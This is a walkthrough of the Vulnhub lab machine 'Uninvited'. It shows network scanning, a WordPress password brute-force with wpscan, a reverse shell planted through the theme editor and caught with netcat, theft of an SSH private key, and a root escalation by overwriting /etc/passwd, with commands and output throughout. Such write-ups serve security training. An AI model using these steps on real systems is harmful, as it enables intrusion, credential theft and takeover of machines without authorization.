Uninvited is a machine from Vulnhub with a difficulty between intermediate and hard according to its creator. It consists on enumerating and bruteforcing wordpress in order to gain initial access, then, taking advantage of a backdoor we can escape the docker container and finally we can abuse misconfigured file permissions to obtain root.
Enumeration
As this machine is from Vulnhub , we are going to perform a ping sweep in order to find which ip from our local network has been assigned to this box .
The simple bash script is the following :
1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash
if [ "$1" == "" ]
then
echo "You forgot an IP adress!"
echo "Syntax: ./ip_scan.sh 192.168.1"
else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi
Running it we find this machine’s ip is 192.168.100.18 :
1
2
3
4
5
6
noxious@kali:~/Desktop$ ./pingsweep.sh 192.168.100
192.168.100.8
192.168.100.10
192.168.100.14
192.168.100.1
192.168.100.18
Now we can run nmap to find which ports are open :
1
2
3
4
5
6
7
8
9
10
nmap -p- 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 13:28 CEST
Nmap scan report for 192.168.100.18
Host is up (0.019s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
80/tcp open http
7894/tcp open unknown
11566/tcp filtered unknown
60000/tcp open unknown
And we run some default scripts on them :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -sC -sV -p 7894,11566,60000 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 14:00 CEST
Nmap scan report for 192.168.100.18
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
7894/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:d2:42:e4:31:ff:4f:fb:0b:de:18:e9:3f:c4:bc:42 (RSA)
| 256 97:56:47:40:ea:99:b2:a6:1a:a5:59:56:7e:2b:b4:a0 (ECDSA)
|_ 256 b2:b1:67:44:75:f6:d8:32:a2:f2:ff:7f:09:a7:7d:53 (ED25519)
11566/tcp closed unknown
60000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: UNINVITED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80 we find the following site :
Inspecting its source code we find a b64 encoded comment :
Next we decode it :
1
2
echo "WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=" | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts
So we add fieldforce to /etc/hosts and access it at port 60000 :
Running gobuster to enumerate hidden directories we get /backdoor, which reveals the wordpress login page :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
gobuster dir -u http://fieldforce:60000/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/wp-content (Status: 301)
/h (Status: 301)
/atom (Status: 200)
/rss2 (Status: 200)
/wp-includes (Status: 301)
/sa (Status: 301)
/rdf (Status: 200)
/sample (Status: 301)
/page1 (Status: 200)
/' (Status: 301)
/he (Status: 301)
/%20 (Status: 301)
/sam (Status: 301)
/hello (Status: 301)
/2020 (Status: 301)
/wp-admin (Status: 301)
/backdoor (Status: 302)
/0000 (Status: 301)
As the site is running wordpress, we can use cewl to create a custom wordlist and then bruteforce this login page with wpscan :
1
cewl http://fieldforce:60000/ --with-numbers -d 2 -m 4 -w wordlist.txt
1
2
3
4
5
6
7
8
9
10
11
12
wpscan --url http://fieldforce:60000/ -P Desktop/wordlist.txt
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - elliot / wh1ter0se
[SUCCESS] - Elliot / wh1ter0se
Trying Elliot / wh1ter0se Time: 00:00:35 <====================== > (1918 / 3836) 50.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: elliot, Password: wh1ter0se
| Username: Elliot, Password: wh1ter0se
Now, with these set of credentials we can log in to the site :
Exploitation
We can get a reverse shell going to theme editor and editing a non active theme such as twenty nineteen with the following php reverse shell
Afterwards, we make that theme the active one and trigger the shell :
1
curl http://fieldforce:60000/404.php
Obtaining a reverse connection as www-data :
1
2
3
4
5
6
7
8
9
10
nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.100.10] from (UNKNOWN) [192.168.100.18] 45660
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
14:18:10 up 17 min, 0 users, load average: 0.07, 0.06, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After upgrading the shell it seems that we are inside a docker container, then , we discover a note that contains a hint :
1
2
3
4
5
6
www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs" | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "LS0taXAtLS0vZnNvY2lldHkuZXhl" | base64 -d
---ip---/fsociety.exewww-data@f950b9c50e1d:/home/demodocker/.local$
We can download that file with wget :
1
wget 192.168.100.18/fsociety.exe
As it is an exe file , we can use wine to execute it, the program asks for a set of credentials which following the machine’s theme are trivial to guess :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:/home/noxious/Downloads# wine fsociety.exe
WELCOME TO BACKDOOR
-------------------
+++++++++++++++++++
===================
USERNAME : elliot
PASSWORD : mrrobot
===================
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
User has been identified, Welcome elliot
###############################################################
TH3 H!N7
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Do you know python-reverse-shell client/server socket program?
If IP_Address is 172.18.0.2, use port 9999
If IP_Address is 172.18.0.3, use port 8888
Remember 'PATIENCE' is the KEY
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Press Enter!
We check the ip and as netcat is not in the machine, we upload it :
1
2
3
4
www-data@f950b9c50e1d:/tmp$ ifconfig | grep 172.18.0
inet 172.18.0.3 netmask 255.255.0.0 broadcast 172.18.255.255
www-data@f950b9c50e1d:/tmp$ which nc
www-data@f950b9c50e1d:/tmp$ wget http://192.168.100.10/nc
Then we can start our listener at port 8888, obtaining a connection :
1
2
3
4
5
6
www-data@f950b9c50e1d:/tmp$ ./nc -lvnp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 59106
/home/docksec> id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
The first flag can be read :
1
2
3
4
5
6
7
8
9
10
11
12
13
/home/docksec> ls
user1.txt
/home/docksec> cat user1.txt
_______ __ __ ___ ___ _______
| | |_| | | | | |
| _____| | | | | ___|
| |_____| | | | | |___
|_____ | | | |___| ___|
_____| | ||_|| | | | |___
|_______|_| |_|___|_______|_______|
FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}
The session obtained closes when we run a cd command, so we can aim to read the private ssh keys in order to gain a more stable shell :
1
/home/docksec> cat .ssh/id_rsa
And we get a shell logging through ssh which in this case is running at port 7894:
1
ssh docksec@192.168.100.18 -i id_rsa -p 7894
Privilege Escalation
Enumerating the machine we see we have writing privileges to modify /etc/passwd
1
2
docksec@uninvited:~$ ls -la /etc/passwd
-rwxrwxrwx 1 777 root 1628 Sep 20 22:29 /etc/passwd
So we can just generate a new password with openssl and insert it with a text editor such as nano :
1
2
3
4
openssl passwd noxious
EfsRhwv.xHlkw
docksec@uninvited:~$ cat /etc/passwd | head -n 1
root:EfsRhwv.xHlkw:0:0:root:/root:/bin/bash
Finally we can access root using our password and obtain the third flag:
1
2
3
4
5
6
7
8
9
10
docksec@uninvited:~$ su root
Password:
root@uninvited:/home/docksec# cat /root/root.txt
.__ .__ __ .___
__ __ ____ |__| _______ _|___/ |_ ____ __| _/
| | \/ \| |/ \ \/ | \ ___/ __ \ / __ |
| | | | | | | \ /| || | \ ___// /_/ |
|____/|___| |__|___| /\_/ |__||__| \___ \____ |
\/ \/ \/ \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}
We got the docker flag left, which can be obtained now as we have full privileges.
First we list docker containers:
1
2
3
4
root@uninvited:~# docker container list
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f950b9c50e1d wordpress:latest "docker-entrypoint.s…" 7 weeks ago Up 29 minutes 0.0.0.0:60000->80/tcp wordpress_wordpress_1_dd9b95034d3d
982523fa9f5f mysql:5.7 "docker-entrypoint.s…" 7 weeks ago Up 29 minutes 3306/tcp, 33060/tcp wordpress_db_1_9676244bc9b2
Now we can execute it and cat the flag :
1
2
3
4
5
6
7
8
9
10
11
root@uninvited:~# docker exec wordpress_wordpress_1_dd9b95034d3d cat /home/demodocker/user2.txt
___ ____ _______ __
/ _]/ |/ ___/ | |
/ [_| o ( \_| | |
| _] |\__ | ~ |
| [_| _ |/ \ |___, |
| | | |\ | |
|_____|__|__| \___|____/ RIGHT ????????
FLAG{FPDSNRWEBT513SDASDHTYHMDSARTSIJO32SDFH}